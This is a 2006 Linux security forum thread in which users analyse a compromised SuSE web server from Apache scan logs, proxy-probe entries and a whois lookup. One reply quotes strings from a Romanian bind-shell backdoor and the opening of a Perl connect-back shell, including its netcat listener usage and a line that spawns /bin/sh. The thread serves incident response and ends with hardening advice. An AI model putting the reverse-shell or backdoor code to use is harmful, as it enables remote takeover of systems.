[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/ads
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] script '/srv/www/vhosts/susebox/html/xmlrpc.php' not found or unable to stat
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/xmlrpc
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/xmlsrv
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/blog
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/drupal
[Sat Jul 01 13:17:31 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/community
[Sat Jul 01 13:17:32 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/blogs
[Sat Jul 01 13:17:32 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/blogs
what does this mean? not resolving?
http://www.dnsstuff.com/tools/ptr.ch?ip=66.221.68.185
 
Old 07-08-2006, 12:03 AM   #7
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Quote:
Originally Posted by Boss Hoss
we know something really happened on Jul 1 16:51 because a new user was added to the server verified by checking the last date stamp on /etc/passwd
Yeah, that's real bad. You'd need root access to do that, so a complete format and rebuild from trusted media is necessary. Also consider all passwords to be compromised.

Quote:
other oddities:
Looks like error messages from someone running a tool scanning for common vulnerabilities. I've never run SuSE as a webserver, but I'm assuming that it has a standard access log of all activity (like /var/log/http/access_log). I'm looking for something with the raw URLs so that you can see the exact exploit initially used.

Quote:
what does this mean? not resolving?
Don't know why it's not resolving (finding a corresponding DNS entry for that IP) on their end (might be the server they are querying. Works for me:

$whois -h whois.arin.net 66.221.68.185
Results:

OrgName: C I Host
OrgID: CIHS
Address: 1851 Central Drive
Address: #110
City: Bedford
StateProv: TX
PostalCode: 76112
Country: US

NetRange: 66.221.0.0 - 66.221.255.255
CIDR: 66.221.0.0/16
NetName: CIHOST7
NetHandle: NET-66-221-0-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS.CIHOST.COM
NameServer: NS2.CIHOST.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-01-17
Updated: 2002-06-17

RTechHandle: NC61-ARIN
RTechName: Network Operations Center
RTechPhone: +1-888-868-9931
RTechEmail: noc@cihost.com

OrgAbuseHandle: ABUSE821-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-888-868-9931
OrgAbuseEmail: abuse@cihost.com

OrgTechHandle: NC61-ARIN
OrgTechName: Network Operations Center
OrgTechPhone: +1-888-868-9931
OrgTechEmail: noc@cihost.com

# ARIN WHOIS database, last updated 2006-07-07 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

Last edited by Capt_Caveman; 07-08-2006 at 12:05 AM.
 
Old 07-08-2006, 12:25 AM   #8
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Original Poster
Rep: Reputation: 15
I have a log file for each vhost setup. (eg /var/log/apache2/vhost_access.log )

here is the access_log entries for the last odditiy I posted
Code:
66.221.68.185 - - [01/Jul/2006:13:17:27 -0400] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:27 -0400] "GET /adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:27 -0400] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:27 -0400] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /ads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /blog/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /drupal/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:31 -0400] "GET /community/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:32 -0400] "GET /blogs/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:32 -0400] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
193.109.122.56 - - [01/Jul/2006:13:32:14 -0400] "CONNECT 193.109.122.67:6668 HTTP/1.0" 302 - "-" "pxyscand/2.1"
195.47.220.2 - - [01/Jul/2006:13:40:45 -0400] "POST http://194.109.153.2:6667/ HTTP/1.0" 302 - "-" "-"
195.47.220.2 - - [01/Jul/2006:13:40:45 -0400] "CONNECT 194.109.153.2:6667 HTTP/1.0" 302 - "-" "-"
208.66.195.2 - - [01/Jul/2006:16:32:30 -0400] "GET /robots.txt HTTP/1.1" 200 27 "-" "psycheclone"
208.66.195.2 - - [01/Jul/2006:16:32:32 -0400] "GET / HTTP/1.1" 302 - "-" "psycheclone"
 
Old 07-08-2006, 12:31 AM   #9
jayjwa
Member
 
Registered: Jul 2003
Location: NY
Distribution: Slackware, Termux
Posts: 922

Rep: Reputation: 339Reputation: 339Reputation: 339Reputation: 339
Well, you got a least one backdoor running on there. Here's his "bash", a very common Romainian backdoor (selected strings output):

Code:
Baga Parola d3co: 
Upss... Parola Gresita .. Protected by : Morfeus!
pqrstuvwxyzabcde
0123456789abcdef
/dev/ptmx
/dev/pty
/dev/tty
socket
bind
listen
Incerc Sa Pornesc Bindu...
OK, pidul este: %d
Am Pornit Bindul ... Multumitimi mie: Morfeus @ Undernet :D
/dev/null
/tmp/
HOME=%s
Can't fork pty, bye!
/bin/sh
mafiaro
Neatza ... Ai Reusit Sa Intri Intrun root In Loc Sa Stai La Asl Pls Stf :D
"super.tar.gz" was gone by the time I found this post, but likely it's the "super.tar.gz" I've seen in the past, a root-kit with PsyBNC (IRC bouncer), the entire thing infected by rst.linux.02 virus.

"x" is a Perl connect back script, these are stuck on exploited systems to help access other systems they want to take over:

Code:
#!/usr/bin/perl
#
# A perl based connect back shell
#
# usage:
#
# $netcat -l -s 127.0.0.1 -p 10001
# $./cbs.pl 127.0.0.1 10001
#
# qobaiashi@u-n-f.com
#
use Socket;

$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';
He's a Script kiddie ("chmod 755 bash" the command he's looking for?). The script also had MSDOS line endings (^M).

Code:
sh: chmdo: command not found
sh: ./bash: Permission denied
sh: ./bash: Permission denied
sh: locate: command not found
The "proxyscand" stuff is likely the IRC server's proxy scanner checking the connecting system for open ports. It doesn't like mine, I guess

Code:
*** Performing DNS lookup for [194.109.153.2] (server 6)
*** DNS lookup for server 6 [194.109.153.2] returned (1) addresses
*** Connecting to server refnum 6 (194.109.153.2), using address 1 (194.109.
+153.2:6667)
*** Odd server stuff: "Proxy Check" (*)
*** INFO -- unix_recv: read(3) failed: Connection reset by peer
*** INFO -- new_io_event: io_callback(3) said fd should be closed
*** INFO -- dgets: Reporting exception for vfd [3]
*** Connection closed from 194.109.153.2
Likely it hit my telnet or ssh tarpits...

Wipe & reformat the lot of it, then make sure you keep up to date on your software. Old PHP scripts look like your downfall here.

Also, consider mounting /tmp and /var/tmp like this

Code:
/dev/hdf1 on /var/tmp type ext2 (rw,noexec,nosuid,nodev)
/dev/hdf2 on /tmp type ext2 (rw,noexec,nosuid,nodev)
which stops alot of cook-book type bots, scripts, and backdoors that assume they can write to /tmp and then execute.

Last edited by jayjwa; 07-08-2006 at 12:47 AM.
 
Old 07-08-2006, 11:32 AM   #10
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Quote:
Originally Posted by Boss Hoss
I have a log file for each vhost setup. (eg /var/log/apache2/vhost_access.log )
here is the access_log entries for the last odditiy I posted
Those are all 404/302, so those are all failed attempts (with the exception of robots.txt which is for informational purposes). I don't believe they are related to the intial compromise, in fact I doubt that is the same cracker. Take a look at the other http logs (including older rotated logs if necessary) for odd URLs with 200 status codes. In particular, try looking around times when the initial compromise occured (June 10-15).
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Tracking the source of a killed job gorets Linux - Networking 3 06-30-2005 10:09 PM
How can a hacker get in!? Impossible! AC97Conquerer Linux - Security 13 03-24-2005 07:52 PM
Catching a Hacker... Shr00mBoXx Linux - Security 14 06-30-2004 10:59 PM
Linux is source open,so it is easily be attacked by hacker?? larrylovelinux Linux - Security 4 05-06-2004 05:08 PM
hacker attack? zetsui Linux - General 4 08-04-2003 07:03 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 04:08 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration